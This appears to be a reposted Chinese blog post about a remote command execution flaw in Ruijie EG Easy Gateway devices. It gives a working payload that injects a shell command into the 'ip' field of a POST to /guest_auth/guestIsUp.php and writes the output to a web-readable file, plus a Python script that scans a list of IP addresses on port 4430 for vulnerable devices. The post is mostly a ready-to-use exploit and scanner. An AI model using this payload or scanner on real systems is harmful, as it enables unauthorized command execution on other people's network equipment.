锐捷EG易网关远程命令执行漏洞-1
生活随笔
收集整理的這篇文章主要介紹了
锐捷EG易网关远程命令执行漏洞-1
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
文章目錄
- 測試poc
- payload1-命令執行結果寫入文件
- payload2-訪問寫入的文件
- 簡單腳本
這里是在EG易網關中測試出來的,不知NBR路由器是否存在
測試poc
/guest_auth/guestIsUp.php如果沒有返回任何信息,且狀態碼為200,那么很大可能存在遠程命令執行
payload1-命令執行結果寫入文件
將whoami命令執行結果寫入到xxoo.txt文件中
POST /guest_auth/guestIsUp.phpmac=1&ip=127.0.0.1|whoami > xxoo.txt
payload2-訪問寫入的文件
url訪問被寫入的文件
http://xx.xx.xx.xx/guest_auth/xxoo.txt獲取到目標當前用戶和當前目錄下的文件
簡單腳本
這個腳本根據狀態碼判斷的,不一定準確,并且4430端口返回200不一定就是銳捷的設備
import requests import logginglogging.captureWarnings(True) #忽略警告 fopen=open("4430.txt",'r') lines=fopen.readlines()#print(lines)for ip in lines:ip=ip.strip()#print("正在測試"+ip)try:#print("https://" + ip + ":4430/guest_auth/guestIsUp.php")r = requests.get("https://"+ip+":4430/guest_auth/guestIsUp.php", verify=False,timeout=1)#print(r.status_code)#print(r.text)if r.status_code==200:print("#################"+ip+"可能存在銳捷命令執行漏洞#################")else:print(ip+"存在銳捷網關,但不存在漏洞")except:pass還有一種遇到的銳捷EG易網關與NBR路由器——命令執行漏洞,點擊傳送門
總結
以上是生活随笔為你收集整理的锐捷EG易网关远程命令执行漏洞-1的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: Apple New+ 有哪些优势在 iP
- 下一篇: 如何使用 iPhone 11 的「人像模